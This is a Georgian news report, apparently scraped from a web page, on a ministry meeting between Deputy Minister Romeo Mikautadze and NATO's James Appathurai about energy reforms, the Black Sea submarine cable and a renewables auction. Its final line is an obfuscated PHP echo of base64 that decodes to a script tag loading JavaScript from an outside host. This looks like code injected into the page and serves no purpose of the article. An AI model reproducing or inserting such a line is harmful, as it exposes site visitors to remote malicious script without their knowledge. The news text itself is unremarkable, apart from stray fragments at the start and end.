celsiusi
ავერსი საქკაბელი

საქართველოს ენერგეტიკის სექტორში მიმდინარე რეფორმები განიხილეს ეკონომიკისა და მდგრადი განვითარების მინისტრის პირველმა მოადგილემ, რომეო მიქაუტაძემ და უსაფრთხოების თანამედროვე გამოწვევების საკითხებში ნატო-ს გენერალური მდივნის თანაშემწემ, ჯეიმს აპატურაიმ ეკონომიკის სამინისტროში გამართულ შეხვედრაზე.

შეხვედრას ასევე ესწრებოდნენ ენერგეტიკული პოლიტიკისა და საინვესტიციო პროექტების დეპარტამენტის უფროსი ჯუბო ტურაშვილი, ენერგოეფექტურობისა და განახლებადი ენერგიების პოლიტიკის და მდგრადი განვითარების დეპარტამენტის უფროსის მოადგილე ომარ წერეთელი, ნატო-ს სამეკავშირეო ოფისის ხელმძღვანელი ალექსანდრე ვინნიკოვი, ნატო-ს სამეკავშირეო ოფისის პოლიტიკური ოფიცერი გვანცა ლოლაძე, ნატო-სთან საქართველოს მუდმივი წარმომადგენლის მოადგილე დავით ნარდაია და ევროატლანტიკური ინტეგრაციის დეპარტამენტის ევროატლანტიკური ინტეგრაციის სამმართველოს მესამე მდივანი მარიამ ჯანელიძე.

ეკონომიკის სამინისტროს პრესსამსახურის ინფორმაციით, მხარეებმა დეტალურად განიხილეს მნიშვნელოვანი ენერგეტიკული პროექტები და ისაუბრეს იმ მიმართულებებზე, რომლებიც საქართველოს მთავრობის თანმიმდევრული პოლიტიკის ფარგლებში ქვეყნის ენერგოუსაფრთხოების განმტკიცებას ემსახურება.

„ამ მხრივ ჯეიმს აპატურაიმ ხაზი გაუსვა შავი ზღვის წყალქვეშა კაბელის პროექტს და აღნიშნა, რომ მისი განხორციელება მნიშვნელოვანია არამხოლოდ საქართველოს, არამედ სამხრეთ კავკასიის განვითარებისთვის.

რომეო მიქაუტაძემ სტუმრებს ასევე გააცნო ის შედეგები, რაც განახლებადი წყაროებიდან ენერგიის წარმოებისა და გამოყენების მხარდაჭერის სქემის ფარგლებში გამოცხადებულ პირველ აუქციონზე დაფიქსირდა. მისი თქმით, აღნიშნული რეფორმა ძალიან წარმატებით ხორციელდება, რაც, საბოლოოდ, ენერგოსექტორში ორ მილიარდ დოლარზე მეტი ინვესტიციის განხორციელების შესაძლებლობებს შექმნის.

ჯეიმს აპატურაის განცხადებით, საქართველოს აქვს დიდი ენერგეტიკული პოტენციალი და მისი რესურსები იძლევა დადგმული სიმძლავრეების ზრდის საშუალებას, რაც ნებისმიერი ქვეყნის ეკონომიკური განვითარებისთვის არსებითად მნიშვნელოვანია“, – ნათქვამია ეკონომიკის სამინისტროს პრესსამსახურის ინფორმაციაში.

მათივე ცნობით, ნატო-ს გენერალური მდივნის თანაშემწემ მხარდაჭერა გამოხატა საქართველოს ენერგეტიკული დარგის მიმართ და აღნიშნა, რომ მუდმივად მზადაა, საკუთარი რესურსებისა და კომპეტენციის ფარგლებში ხელი შეუწყოს ამ მნიშვნელოვანი მიმართულების განვითარებას საქართველოში. 

270
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");